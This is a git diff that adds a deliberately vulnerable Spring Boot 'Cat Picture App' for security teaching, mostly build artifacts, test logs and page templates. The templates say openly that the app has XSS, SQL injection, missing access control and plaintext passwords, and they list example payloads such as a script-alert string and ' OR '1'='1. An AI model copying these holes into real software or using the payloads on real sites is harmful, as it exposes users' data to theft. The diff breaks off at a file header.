a/insecure-java/build/classes/java/main/com/example/catapp/controllers/CommentController.class b/insecure-java/build/classes/java/main/com/example/catapp/controllers/CommentController.class new file mode 100644 index 0000000..8f1f884 Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/controllers/CommentController.class differ diff --git a/insecure-java/build/classes/java/main/com/example/catapp/controllers/HomeController.class b/insecure-java/build/classes/java/main/com/example/catapp/controllers/HomeController.class new file mode 100644 index 0000000..1ccd8f7 Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/controllers/HomeController.class differ diff --git a/insecure-java/build/classes/java/main/com/example/catapp/controllers/UserController.class b/insecure-java/build/classes/java/main/com/example/catapp/controllers/UserController.class new file mode 100644 index 0000000..68cbe60 Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/controllers/UserController.class differ diff --git a/insecure-java/build/classes/java/main/com/example/catapp/models/CatPicture.class b/insecure-java/build/classes/java/main/com/example/catapp/models/CatPicture.class new file mode 100644 index 0000000..edaa46b Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/models/CatPicture.class differ diff --git a/insecure-java/build/classes/java/main/com/example/catapp/models/Comment.class b/insecure-java/build/classes/java/main/com/example/catapp/models/Comment.class new file mode 100644 index 0000000..e5ad8d6 Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/models/Comment.class differ diff --git a/insecure-java/build/classes/java/main/com/example/catapp/models/User.class b/insecure-java/build/classes/java/main/com/example/catapp/models/User.class new file mode 100644 index 0000000..a0df6ce Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/models/User.class differ diff --git a/insecure-java/build/classes/java/main/com/example/catapp/repositories/CatPictureRepository.class b/insecure-java/build/classes/java/main/com/example/catapp/repositories/CatPictureRepository.class new file mode 100644 index 0000000..ed0e9b1 Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/repositories/CatPictureRepository.class differ diff --git a/insecure-java/build/classes/java/main/com/example/catapp/repositories/CommentRepository.class b/insecure-java/build/classes/java/main/com/example/catapp/repositories/CommentRepository.class new file mode 100644 index 0000000..5a9d7b9 Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/repositories/CommentRepository.class differ diff --git a/insecure-java/build/classes/java/main/com/example/catapp/repositories/UserRepository.class b/insecure-java/build/classes/java/main/com/example/catapp/repositories/UserRepository.class new file mode 100644 index 0000000..9e5fc5a Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/repositories/UserRepository.class differ diff --git a/insecure-java/build/classes/java/main/com/example/insecurejava/InsecureJavaApplication.class b/insecure-java/build/classes/java/main/com/example/insecurejava/InsecureJavaApplication.class index 4d7dcfd..82b444b 100644 Binary files a/insecure-java/build/classes/java/main/com/example/insecurejava/InsecureJavaApplication.class and b/insecure-java/build/classes/java/main/com/example/insecurejava/InsecureJavaApplication.class differ diff --git a/insecure-java/build/classes/java/main/com/example/insecurejava/UnsafeDeserializationController.class b/insecure-java/build/classes/java/main/com/example/insecurejava/UnsafeDeserializationController.class index ed83a4a..6dcc523 100644 Binary files a/insecure-java/build/classes/java/main/com/example/insecurejava/UnsafeDeserializationController.class and b/insecure-java/build/classes/java/main/com/example/insecurejava/UnsafeDeserializationController.class differ diff --git a/insecure-java/build/classes/java/test/com/example/insecurejava/InsecureJavaApplicationTests.class b/insecure-java/build/classes/java/test/com/example/insecurejava/InsecureJavaApplicationTests.class index bda1f57..5d3452a 100644 Binary files a/insecure-java/build/classes/java/test/com/example/insecurejava/InsecureJavaApplicationTests.class and b/insecure-java/build/classes/java/test/com/example/insecurejava/InsecureJavaApplicationTests.class differ diff --git a/insecure-java/build/libs/insecure-java-0.0.1-SNAPSHOT-plain.jar b/insecure-java/build/libs/insecure-java-0.0.1-SNAPSHOT-plain.jar index 04bef06..a929bf5 100644 Binary files a/insecure-java/build/libs/insecure-java-0.0.1-SNAPSHOT-plain.jar and b/insecure-java/build/libs/insecure-java-0.0.1-SNAPSHOT-plain.jar differ diff --git a/insecure-java/build/libs/insecure-java-0.0.1-SNAPSHOT.jar b/insecure-java/build/libs/insecure-java-0.0.1-SNAPSHOT.jar index 1c22301..ac147e4 100644 Binary files a/insecure-java/build/libs/insecure-java-0.0.1-SNAPSHOT.jar and b/insecure-java/build/libs/insecure-java-0.0.1-SNAPSHOT.jar differ diff --git a/insecure-java/build/reports/tests/test/classes/com.example.insecurejava.InsecureJavaApplicationTests.html b/insecure-java/build/reports/tests/test/classes/com.example.insecurejava.InsecureJavaApplicationTests.html index 553f80e..7deef77 100644 --- a/insecure-java/build/reports/tests/test/classes/com.example.insecurejava.InsecureJavaApplicationTests.html +++ b/insecure-java/build/reports/tests/test/classes/com.example.insecurejava.InsecureJavaApplicationTests.html @@ -41,7 +41,7 @@

    InsecureJavaApplicationTests

    -
    0.415s
    +
    0.136s

    duration

    @@ -79,7 +79,7 @@

    Tests

    contextLoads() -0.415s +0.136s passed @@ -87,8 +87,21 @@

    Tests

    Standard output

    -
    19:26:46.061 [Test worker] INFO org.springframework.test.context.support.AnnotationConfigContextLoaderUtils -- Could not detect default configuration classes for test class [com.example.insecurejava.InsecureJavaApplicationTests]: InsecureJavaApplicationTests does not declare any static, non-private, non-final, nested classes annotated with @Configuration.
-19:26:46.116 [Test worker] INFO org.springframework.boot.test.context.SpringBootTestContextBootstrapper -- Found @SpringBootConfiguration com.example.insecurejava.InsecureJavaApplication for test class com.example.insecurejava.InsecureJavaApplicationTests
+
    19:30:59.468 [Test worker] DEBUG org.springframework.test.context.BootstrapUtils - Instantiating CacheAwareContextLoaderDelegate from class [org.springframework.test.context.cache.DefaultCacheAwareContextLoaderDelegate]
+19:30:59.473 [Test worker] DEBUG org.springframework.test.context.BootstrapUtils - Instantiating BootstrapContext using constructor [public org.springframework.test.context.support.DefaultBootstrapContext(java.lang.Class,org.springframework.test.context.CacheAwareContextLoaderDelegate)]
+19:30:59.489 [Test worker] DEBUG org.springframework.test.context.BootstrapUtils - Instantiating TestContextBootstrapper for test class [com.example.insecurejava.InsecureJavaApplicationTests] from class [org.springframework.boot.test.context.SpringBootTestContextBootstrapper]
+19:30:59.494 [Test worker] INFO org.springframework.boot.test.context.SpringBootTestContextBootstrapper - Neither @ContextConfiguration nor @ContextHierarchy found for test class [com.example.insecurejava.InsecureJavaApplicationTests], using SpringBootContextLoader
+19:30:59.495 [Test worker] DEBUG org.springframework.test.context.support.AbstractContextLoader - Did not detect default resource location for test class [com.example.insecurejava.InsecureJavaApplicationTests]: class path resource [com/example/insecurejava/InsecureJavaApplicationTests-context.xml] does not exist
+19:30:59.495 [Test worker] DEBUG org.springframework.test.context.support.AbstractContextLoader - Did not detect default resource location for test class [com.example.insecurejava.InsecureJavaApplicationTests]: class path resource [com/example/insecurejava/InsecureJavaApplicationTestsContext.groovy] does not exist
+19:30:59.495 [Test worker] INFO org.springframework.test.context.support.AbstractContextLoader - Could not detect default resource locations for test class [com.example.insecurejava.InsecureJavaApplicationTests]: no resource found for suffixes {-context.xml, Context.groovy}.
+19:30:59.496 [Test worker] INFO org.springframework.test.context.support.AnnotationConfigContextLoaderUtils - Could not detect default configuration classes for test class [com.example.insecurejava.InsecureJavaApplicationTests]: InsecureJavaApplicationTests does not declare any static, non-private, non-final, nested classes annotated with @Configuration.
+19:30:59.516 [Test worker] DEBUG org.springframework.test.context.support.ActiveProfilesUtils - Could not find an 'annotation declaring class' for annotation type [org.springframework.test.context.ActiveProfiles] and class [com.example.insecurejava.InsecureJavaApplicationTests]
+19:30:59.542 [Test worker] DEBUG org.springframework.context.annotation.ClassPathScanningCandidateComponentProvider - Identified candidate component class: file [/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-java/build/classes/java/main/com/example/insecurejava/InsecureJavaApplication.class]
+19:30:59.549 [Test worker] INFO org.springframework.boot.test.context.SpringBootTestContextBootstrapper - Found @SpringBootConfiguration com.example.insecurejava.InsecureJavaApplication for test class com.example.insecurejava.InsecureJavaApplicationTests
+19:30:59.584 [Test worker] DEBUG org.springframework.boot.test.context.SpringBootTestContextBootstrapper - @TestExecutionListeners is not present for class [com.example.insecurejava.InsecureJavaApplicationTests]: using defaults.
+19:30:59.584 [Test worker] INFO org.springframework.boot.test.context.SpringBootTestContextBootstrapper - Loaded default TestExecutionListener class names from location [META-INF/spring.factories]: [org.springframework.boot.test.autoconfigure.restdocs.RestDocsTestExecutionListener, org.springframework.boot.test.autoconfigure.web.client.MockRestServiceServerResetTestExecutionListener, org.springframework.boot.test.autoconfigure.web.servlet.MockMvcPrintOnlyOnFailureTestExecutionListener, org.springframework.boot.test.autoconfigure.web.servlet.WebDriverTestExecutionListener, org.springframework.boot.test.autoconfigure.webservices.client.MockWebServiceServerTestExecutionListener, org.springframework.boot.test.mock.mockito.MockitoTestExecutionListener, org.springframework.boot.test.mock.mockito.ResetMocksTestExecutionListener, org.springframework.test.context.web.ServletTestExecutionListener, org.springframework.test.context.support.DirtiesContextBeforeModesTestExecutionListener, org.springframework.test.context.event.ApplicationEventsTestExecutionListener, org.springframework.test.context.support.DependencyInjectionTestExecutionListener, org.springframework.test.context.support.DirtiesContextTestExecutionListener, org.springframework.test.context.transaction.TransactionalTestExecutionListener, org.springframework.test.context.jdbc.SqlScriptsTestExecutionListener, org.springframework.test.context.event.EventPublishingTestExecutionListener]
+19:30:59.590 [Test worker] INFO org.springframework.boot.test.context.SpringBootTestContextBootstrapper - Using TestExecutionListeners: [org.springframework.test.context.web.ServletTestExecutionListener@3d484181, org.springframework.test.context.support.DirtiesContextBeforeModesTestExecutionListener@6111ba37, org.springframework.test.context.event.ApplicationEventsTestExecutionListener@7be58f16, org.springframework.boot.test.mock.mockito.MockitoTestExecutionListener@242aa8d9, org.springframework.boot.test.autoconfigure.SpringBootDependencyInjectionTestExecutionListener@5b11a194, org.springframework.test.context.support.DirtiesContextTestExecutionListener@37bd68c3, org.springframework.test.context.transaction.TransactionalTestExecutionListener@60f7cc1d, org.springframework.test.context.jdbc.SqlScriptsTestExecutionListener@11eadcba, org.springframework.test.context.event.EventPublishingTestExecutionListener@4721d212, org.springframework.boot.test.autoconfigure.restdocs.RestDocsTestExecutionListener@1b065145, org.springframework.boot.test.autoconfigure.web.client.MockRestServiceServerResetTestExecutionListener@45cff11c, org.springframework.boot.test.autoconfigure.web.servlet.MockMvcPrintOnlyOnFailureTestExecutionListener@207ea13, org.springframework.boot.test.autoconfigure.web.servlet.WebDriverTestExecutionListener@4bff1903, org.springframework.boot.test.autoconfigure.webservices.client.MockWebServiceServerTestExecutionListener@62dae540, org.springframework.boot.test.mock.mockito.ResetMocksTestExecutionListener@5827af16]
+19:30:59.592 [Test worker] DEBUG org.springframework.test.context.support.AbstractDirtiesContextTestExecutionListener - Before test class: context [DefaultTestContext@a8c1f44 testClass = InsecureJavaApplicationTests, testInstance = [null], testMethod = [null], testException = [null], mergedContextConfiguration = [WebMergedContextConfiguration@150ab4ed testClass = InsecureJavaApplicationTests, locations = '{}', classes = '{class com.example.insecurejava.InsecureJavaApplication}', contextInitializerClasses = '[]', activeProfiles = '{}', propertySourceLocations = '{}', propertySourceProperties = '{org.springframework.boot.test.context.SpringBootTestContextBootstrapper=true}', contextCustomizers = set[org.springframework.boot.test.autoconfigure.actuate.metrics.MetricsExportContextCustomizerFactory$DisableMetricExportContextCustomizer@36a5cabc, org.springframework.boot.test.autoconfigure.properties.PropertyMappingContextCustomizer@0, org.springframework.boot.test.autoconfigure.web.servlet.WebDriverContextCustomizerFactory$Customizer@4ff8d125, org.springframework.boot.test.context.filter.ExcludeFilterContextCustomizer@327bcebd, org.springframework.boot.test.json.DuplicateJsonObjectContextCustomizerFactory$DuplicateJsonObjectContextCustomizer@1339e7aa, org.springframework.boot.test.mock.mockito.MockitoContextCustomizer@0, org.springframework.boot.test.web.client.TestRestTemplateContextCustomizer@31ff43be, org.springframework.boot.test.context.SpringBootTestArgs@1, org.springframework.boot.test.context.SpringBootTestWebEnvironment@6aaceffd], resourceBasePath = 'src/main/webapp', contextLoader = 'org.springframework.boot.test.context.SpringBootContextLoader', parent = [null]], attributes = map['org.springframework.test.context.web.ServletTestExecutionListener.activateListener' -> true]], class annotated with @DirtiesContext [false] with mode [null].
 
   .   ____          _            __ _ _
  /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
@@ -96,11 +109,22 @@ 
    Standard output
    
  \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
   '  |____| .__|_| |_|_| |_\__, | / / / /
  =========|_|==============|___/=/_/_/_/
- :: Spring Boot ::                (v3.2.4)
+ :: Spring Boot ::                (v2.7.3)
 
-2024-03-27T19:26:46.320-04:00  INFO 39301 --- [insecure-java] [    Test worker] c.e.i.InsecureJavaApplicationTests       : Starting InsecureJavaApplicationTests using Java 17.0.10 with PID 39301 (started by confusedcrib in /home/confusedcrib/git/insecure-kubernetes-deployments/insecure-java)
-2024-03-27T19:26:46.321-04:00  INFO 39301 --- [insecure-java] [    Test worker] c.e.i.InsecureJavaApplicationTests       : No active profile set, falling back to 1 default profile: "default"
-2024-03-27T19:26:46.919-04:00  INFO 39301 --- [insecure-java] [    Test worker] c.e.i.InsecureJavaApplicationTests       : Started InsecureJavaApplicationTests in 0.736 seconds (process running for 1.302)
+2024-11-21 19:30:59.742  INFO 37571 --- [    Test worker] c.e.i.InsecureJavaApplicationTests       : Starting InsecureJavaApplicationTests using Java 17.0.10 on james-2023 with PID 37571 (started by confusedcrib in /home/confusedcrib/git/insecure-kubernetes-deployments/insecure-java)
+2024-11-21 19:30:59.742  INFO 37571 --- [    Test worker] c.e.i.InsecureJavaApplicationTests       : No active profile set, falling back to 1 default profile: "default"
+2024-11-21 19:31:00.022  INFO 37571 --- [    Test worker] .s.d.r.c.RepositoryConfigurationDelegate : Bootstrapping Spring Data JPA repositories in DEFAULT mode.
+2024-11-21 19:31:00.032  INFO 37571 --- [    Test worker] .s.d.r.c.RepositoryConfigurationDelegate : Finished Spring Data repository scanning in 3 ms. Found 0 JPA repository interfaces.
+2024-11-21 19:31:00.289  INFO 37571 --- [    Test worker] o.hibernate.jpa.internal.util.LogHelper  : HHH000204: Processing PersistenceUnitInfo [name: default]
+2024-11-21 19:31:00.309  INFO 37571 --- [    Test worker] org.hibernate.Version                    : HHH000412: Hibernate ORM core version 5.6.10.Final
+2024-11-21 19:31:00.370  INFO 37571 --- [    Test worker] o.hibernate.annotations.common.Version   : HCANN000001: Hibernate Commons Annotations {5.1.2.Final}
+2024-11-21 19:31:00.405  INFO 37571 --- [    Test worker] com.zaxxer.hikari.HikariDataSource       : HikariPool-1 - Starting...
+2024-11-21 19:31:00.487  INFO 37571 --- [    Test worker] com.zaxxer.hikari.HikariDataSource       : HikariPool-1 - Start completed.
+2024-11-21 19:31:00.494  INFO 37571 --- [    Test worker] org.hibernate.dialect.Dialect            : HHH000400: Using dialect: org.hibernate.dialect.H2Dialect
+2024-11-21 19:31:00.564  INFO 37571 --- [    Test worker] o.h.e.t.j.p.i.JtaPlatformInitiator       : HHH000490: Using JtaPlatform implementation: [org.hibernate.engine.transaction.jta.platform.internal.NoJtaPlatform]
+2024-11-21 19:31:00.567  INFO 37571 --- [    Test worker] j.LocalContainerEntityManagerFactoryBean : Initialized JPA EntityManagerFactory for persistence unit 'default'
+2024-11-21 19:31:00.667  WARN 37571 --- [    Test worker] JpaBaseConfiguration$JpaWebConfiguration : spring.jpa.open-in-view is enabled by default. Therefore, database queries may be performed during view rendering. Explicitly configure spring.jpa.open-in-view to disable this warning
+2024-11-21 19:31:01.024  INFO 37571 --- [    Test worker] c.e.i.InsecureJavaApplicationTests       : Started InsecureJavaApplicationTests in 1.414 seconds (JVM running for 1.915)
    @@ -112,7 +136,7 @@

    Standard output

    Generated by -Gradle 7.5 at Mar 27, 2024, 7:26:47 PM

    +Gradle 7.5 at Nov 21, 2024, 7:31:01 PM

    diff --git a/insecure-java/build/reports/tests/test/index.html b/insecure-java/build/reports/tests/test/index.html index 7f9c24a..1e78eb3 100644 --- a/insecure-java/build/reports/tests/test/index.html +++ b/insecure-java/build/reports/tests/test/index.html @@ -38,7 +38,7 @@

    Test Summary

    -
    0.415s
    +
    0.136s

    duration

    @@ -85,7 +85,7 @@

    Packages

    1 0 0 -0.415s +0.136s 100% @@ -112,7 +112,7 @@

    Classes

    1 0 0 -0.415s +0.136s 100% @@ -126,7 +126,7 @@

    Classes

    Generated by -Gradle 7.5 at Mar 27, 2024, 7:26:47 PM

    +Gradle 7.5 at Nov 21, 2024, 7:31:01 PM

    diff --git a/insecure-java/build/reports/tests/test/packages/com.example.insecurejava.html b/insecure-java/build/reports/tests/test/packages/com.example.insecurejava.html index 6f48c1e..c8da917 100644 --- a/insecure-java/build/reports/tests/test/packages/com.example.insecurejava.html +++ b/insecure-java/build/reports/tests/test/packages/com.example.insecurejava.html @@ -40,7 +40,7 @@

    Package com.example.insecurejava

    -
    0.415s
    +
    0.136s

    duration

    @@ -83,7 +83,7 @@

    Classes

    1 0 0 -0.415s +0.136s 100% @@ -96,7 +96,7 @@

    Classes

    Generated by -Gradle 7.5 at Mar 27, 2024, 7:26:47 PM

    +Gradle 7.5 at Nov 21, 2024, 7:31:01 PM

    diff --git a/insecure-java/build/resolvedMainClassName b/insecure-java/build/resolvedMainClassName deleted file mode 100644 index 261aa28..0000000 --- a/insecure-java/build/resolvedMainClassName +++ /dev/null @@ -1 +0,0 @@ -com.example.insecurejava.InsecureJavaApplication \ No newline at end of file diff --git a/insecure-java/build/resources/main/application.properties b/insecure-java/build/resources/main/application.properties index 39412a3..1724494 100644 --- a/insecure-java/build/resources/main/application.properties +++ b/insecure-java/build/resources/main/application.properties @@ -1 +1,16 @@ -spring.application.name=insecure-java +# Server port (optional) +server.port=8080 + +# Database configuration +spring.datasource.url=jdbc:h2:mem:testdb +spring.datasource.driverClassName=org.h2.Driver +spring.datasource.username=sa +spring.datasource.password= + +# JPA configuration +spring.jpa.database-platform=org.hibernate.dialect.H2Dialect +spring.jpa.show-sql=true +spring.jpa.hibernate.ddl-auto=create-drop + +# Thymeleaf configuration +spring.thymeleaf.cache=false diff --git a/insecure-java/build/resources/main/templates/addComment.html b/insecure-java/build/resources/main/templates/addComment.html new file mode 100644 index 0000000..2c0d0fd --- /dev/null +++ b/insecure-java/build/resources/main/templates/addComment.html @@ -0,0 +1,20 @@ + + + + Add Comment + + +

    Add Comment

    + +

    Note: This page is vulnerable to XSS attacks. Malicious scripts can be injected via the comment field.

    +
    +
    +
    + +
    +

    Example Payload:

    +
      +
    • Comment Text: <script>alert('XSS Attack');</script>
      • +
    + + diff --git a/insecure-java/build/resources/main/templates/addCommentResult.html b/insecure-java/build/resources/main/templates/addCommentResult.html new file mode 100644 index 0000000..f146bc8 --- /dev/null +++ b/insecure-java/build/resources/main/templates/addCommentResult.html @@ -0,0 +1,11 @@ + + + + Add Comment Result + + +

    + +

    Note: The comment you added may contain scripts that execute when viewing comments.

    + + diff --git a/insecure-java/build/resources/main/templates/comments.html b/insecure-java/build/resources/main/templates/comments.html new file mode 100644 index 0000000..f1b4d58 --- /dev/null +++ b/insecure-java/build/resources/main/templates/comments.html @@ -0,0 +1,15 @@ + + + + Comments + + +

    Comments

    + +

    Note: The comments below are displayed without sanitization, which can lead to XSS attacks.

    +
      + +
    • +
    + + diff --git a/insecure-java/build/resources/main/templates/delete.html b/insecure-java/build/resources/main/templates/delete.html new file mode 100644 index 0000000..368ebb4 --- /dev/null +++ b/insecure-java/build/resources/main/templates/delete.html @@ -0,0 +1,19 @@ + + + + Delete Picture + + +

    Delete Cat Picture

    + +

    Note: This function lacks access control. Any user can delete any picture by specifying its ID.

    +
    +
    + +
    +

    Example Payload:

    +
      +
    • Picture ID: 1
      • +
    + + diff --git a/insecure-java/build/resources/main/templates/deleteResult.html b/insecure-java/build/resources/main/templates/deleteResult.html new file mode 100644 index 0000000..c4fd704 --- /dev/null +++ b/insecure-java/build/resources/main/templates/deleteResult.html @@ -0,0 +1,11 @@ + + + + Delete Result + + +

    + +

    Note: The picture was deleted without verifying your permissions.

    + + diff --git a/insecure-java/build/resources/main/templates/home.html b/insecure-java/build/resources/main/templates/home.html new file mode 100644 index 0000000..9c3df3e --- /dev/null +++ b/insecure-java/build/resources/main/templates/home.html @@ -0,0 +1,23 @@ + + + + Home - Cat Picture App + + +
    +

    Welcome to the Cat Picture App

    + +
    +
    +

    This application demonstrates various security vulnerabilities for educational purposes.

    +

    Please select an option from the menu above to explore the functionalities.

    +
    + + diff --git a/insecure-java/build/resources/main/templates/layout.html b/insecure-java/build/resources/main/templates/layout.html new file mode 100644 index 0000000..3241d31 --- /dev/null +++ b/insecure-java/build/resources/main/templates/layout.html @@ -0,0 +1,24 @@ + + + + Cat Picture App + + + +
    +

    Cat Picture App

    + +
    +
    +
    +
    + + diff --git a/insecure-java/build/resources/main/templates/login.html b/insecure-java/build/resources/main/templates/login.html new file mode 100644 index 0000000..a0bc860 --- /dev/null +++ b/insecure-java/build/resources/main/templates/login.html @@ -0,0 +1,21 @@ + + + + Login + + +

    Login

    + +

    Note: The login process lacks secure session management and uses plaintext passwords.

    +
    +
    +
    + +
    +

    Example Credentials:

    +
      +
    • Username: user1
      • +
    • Password: password123
      • +
    + + diff --git a/insecure-java/build/resources/main/templates/loginResult.html b/insecure-java/build/resources/main/templates/loginResult.html new file mode 100644 index 0000000..2b8de1f --- /dev/null +++ b/insecure-java/build/resources/main/templates/loginResult.html @@ -0,0 +1,11 @@ + + + + Login Result + + +

    + +

    Note: The application does not implement secure session management, making it vulnerable to attacks.

    + + diff --git a/insecure-java/build/resources/main/templates/register.html b/insecure-java/build/resources/main/templates/register.html new file mode 100644 index 0000000..b17c313 --- /dev/null +++ b/insecure-java/build/resources/main/templates/register.html @@ -0,0 +1,21 @@ + + + + Register + + +

    Register

    + +

    Note: This application stores passwords in plaintext. Please use a simple password for testing purposes.

    +
    +
    +
    + +
    +

    Example Payload:

    +
      +
    • Username: user1
      • +
    • Password: password123
      • +
    + + diff --git a/insecure-java/build/resources/main/templates/registerResult.html b/insecure-java/build/resources/main/templates/registerResult.html new file mode 100644 index 0000000..fab4c55 --- /dev/null +++ b/insecure-java/build/resources/main/templates/registerResult.html @@ -0,0 +1,11 @@ + + + + Registration Result + + +

    + +

    Note: Your password is stored in plaintext. This is insecure and demonstrates a common vulnerability.

    + + diff --git a/insecure-java/build/resources/main/templates/search.html b/insecure-java/build/resources/main/templates/search.html new file mode 100644 index 0000000..3dd7302 --- /dev/null +++ b/insecure-java/build/resources/main/templates/search.html @@ -0,0 +1,19 @@ + + + + Search Pictures + + +

    Search Cat Pictures

    + +

    Note: This search is vulnerable to SQL Injection attacks. Malicious SQL code can be injected via the name field.

    +
    +
    + +
    +

    Example Payload:

    +
      +
    • Name: ' OR '1'='1
      • +
    + + diff --git a/insecure-java/build/resources/main/templates/searchResults.html b/insecure-java/build/resources/main/templates/searchResults.html new file mode 100644 index 0000000..289f81c --- /dev/null +++ b/insecure-java/build/resources/main/templates/searchResults.html @@ -0,0 +1,17 @@ + + + + Search Results + + +

    Search Results

    +

    Results for your search query:

    +
      +
    • +
      + +
      • +
    + + + diff --git a/insecure-java/build/test-results/test/TEST-com.example.insecurejava.InsecureJavaApplicationTests.xml b/insecure-java/build/test-results/test/TEST-com.example.insecurejava.InsecureJavaApplicationTests.xml index 424de0a..2c040bf 100644 --- a/insecure-java/build/test-results/test/TEST-com.example.insecurejava.InsecureJavaApplicationTests.xml +++ b/insecure-java/build/test-results/test/TEST-com.example.insecurejava.InsecureJavaApplicationTests.xml @@ -1,9 +1,22 @@ - + - - + true]], class annotated with @DirtiesContext [false] with mode [null]. . ____ _ __ _ _ /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \ @@ -11,11 +24,22 @@ \\/ ___)| |_)| | | | | || (_| | ) ) ) ) ' |____| .__|_| |_|_| |_\__, | / / / / =========|_|==============|___/=/_/_/_/ - :: Spring Boot :: (v3.2.4) + :: Spring Boot :: (v2.7.3) -2024-03-27T19:26:46.320-04:00 INFO 39301 --- [insecure-java] [ Test worker] c.e.i.InsecureJavaApplicationTests : Starting InsecureJavaApplicationTests using Java 17.0.10 with PID 39301 (started by confusedcrib in /home/confusedcrib/git/insecure-kubernetes-deployments/insecure-java) -2024-03-27T19:26:46.321-04:00 INFO 39301 --- [insecure-java] [ Test worker] c.e.i.InsecureJavaApplicationTests : No active profile set, falling back to 1 default profile: "default" -2024-03-27T19:26:46.919-04:00 INFO 39301 --- [insecure-java] [ Test worker] c.e.i.InsecureJavaApplicationTests : Started InsecureJavaApplicationTests in 0.736 seconds (process running for 1.302) +2024-11-21 19:30:59.742 INFO 37571 --- [ Test worker] c.e.i.InsecureJavaApplicationTests : Starting InsecureJavaApplicationTests using Java 17.0.10 on james-2023 with PID 37571 (started by confusedcrib in /home/confusedcrib/git/insecure-kubernetes-deployments/insecure-java) +2024-11-21 19:30:59.742 INFO 37571 --- [ Test worker] c.e.i.InsecureJavaApplicationTests : No active profile set, falling back to 1 default profile: "default" +2024-11-21 19:31:00.022 INFO 37571 --- [ Test worker] .s.d.r.c.RepositoryConfigurationDelegate : Bootstrapping Spring Data JPA repositories in DEFAULT mode. +2024-11-21 19:31:00.032 INFO 37571 --- [ Test worker] .s.d.r.c.RepositoryConfigurationDelegate : Finished Spring Data repository scanning in 3 ms. Found 0 JPA repository interfaces. +2024-11-21 19:31:00.289 INFO 37571 --- [ Test worker] o.hibernate.jpa.internal.util.LogHelper : HHH000204: Processing PersistenceUnitInfo [name: default] +2024-11-21 19:31:00.309 INFO 37571 --- [ Test worker] org.hibernate.Version : HHH000412: Hibernate ORM core version 5.6.10.Final +2024-11-21 19:31:00.370 INFO 37571 --- [ Test worker] o.hibernate.annotations.common.Version : HCANN000001: Hibernate Commons Annotations {5.1.2.Final} +2024-11-21 19:31:00.405 INFO 37571 --- [ Test worker] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Starting... +2024-11-21 19:31:00.487 INFO 37571 --- [ Test worker] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Start completed. +2024-11-21 19:31:00.494 INFO 37571 --- [ Test worker] org.hibernate.dialect.Dialect : HHH000400: Using dialect: org.hibernate.dialect.H2Dialect +2024-11-21 19:31:00.564 INFO 37571 --- [ Test worker] o.h.e.t.j.p.i.JtaPlatformInitiator : HHH000490: Using JtaPlatform implementation: [org.hibernate.engine.transaction.jta.platform.internal.NoJtaPlatform] +2024-11-21 19:31:00.567 INFO 37571 --- [ Test worker] j.LocalContainerEntityManagerFactoryBean : Initialized JPA EntityManagerFactory for persistence unit 'default' +2024-11-21 19:31:00.667 WARN 37571 --- [ Test worker] JpaBaseConfiguration$JpaWebConfiguration : spring.jpa.open-in-view is enabled by default. Therefore, database queries may be performed during view rendering. Explicitly configure spring.jpa.open-in-view to disable this warning +2024-11-21 19:31:01.024 INFO 37571 --- [ Test worker] c.e.i.InsecureJavaApplicationTests : Started InsecureJavaApplicationTests in 1.414 seconds (JVM running for 1.915) ]]> diff --git a/insecure-java/build/test-results/test/binary/output.bin b/insecure-java/build/test-results/test/binary/output.bin index d3fb150..fb61a64 100644 Binary files a/insecure-java/build/test-results/test/binary/output.bin and b/insecure-java/build/test-results/test/binary/output.bin differ diff --git a/insecure-java/build/test-results/test/binary/output.bin.idx b/insecure-java/build/test-results/test/binary/output.bin.idx index ac0529d..d724b5a 100644 Binary files a/insecure-java/build/test-results/test/binary/output.bin.idx and b/insecure-java/build/test-results/test/binary/output.bin.idx differ diff --git a/insecure-java/build/test-results/test/binary/results.bin b/insecure-java/build/test-results/test/binary/results.bin index 613a759..495b144 100644 Binary files a/insecure-java/build/test-results/test/binary/results.bin and b/insecure-java/build/test-results/test/binary/results.bin differ diff --git a/insecure-java/build/tmp/bootJar/MANIFEST.MF b/insecure-java/build/tmp/bootJar/MANIFEST.MF index c99d411..58630c0 100644 --- a/insecure-java/build/tmp/bootJar/MANIFEST.MF +++ b/insecure-java/build/tmp/bootJar/MANIFEST.MF @@ -1,12 +1,2 @@ Manifest-Version: 1.0 -Main-Class: org.springframework.boot.loader.launch.JarLauncher -Start-Class: com.example.insecurejava.InsecureJavaApplication -Spring-Boot-Version: 3.2.4 -Spring-Boot-Classes: BOOT-INF/classes/ -Spring-Boot-Lib: BOOT-INF/lib/ -Spring-Boot-Classpath-Index: BOOT-INF/classpath.idx -Spring-Boot-Layers-Index: BOOT-INF/layers.idx -Build-Jdk-Spec: 17 -Implementation-Title: insecure-java -Implementation-Version: 0.0.1-SNAPSHOT diff --git a/insecure-java/build/tmp/compileJava/previous-compilation-data.bin b/insecure-java/build/tmp/compileJava/previous-compilation-data.bin index 10eb2d1..61337c6 100644 Binary files a/insecure-java/build/tmp/compileJava/previous-compilation-data.bin and b/insecure-java/build/tmp/compileJava/previous-compilation-data.bin differ diff --git a/insecure-java/build/tmp/compileTestJava/previous-compilation-data.bin b/insecure-java/build/tmp/compileTestJava/previous-compilation-data.bin index 228c372..c7dbcb8 100644 Binary files a/insecure-java/build/tmp/compileTestJava/previous-compilation-data.bin and b/insecure-java/build/tmp/compileTestJava/previous-compilation-data.bin differ diff --git a/insecure-java/src/main/java/com/example/catapp/CatAppApplication.java b/insecure-java/src/main/java/com/example/catapp/CatAppApplication.java new file mode 100644 index 0000000..a9b09ef --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/CatAppApplication.java @@ -0,0 +1,12 @@ +package com.example.catapp; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class CatAppApplication { + + public static void main(String[] args) { + SpringApplication.run(CatAppApplication.class, args); + } +} diff --git a/insecure-java/src/main/java/com/example/catapp/CatApplication.java 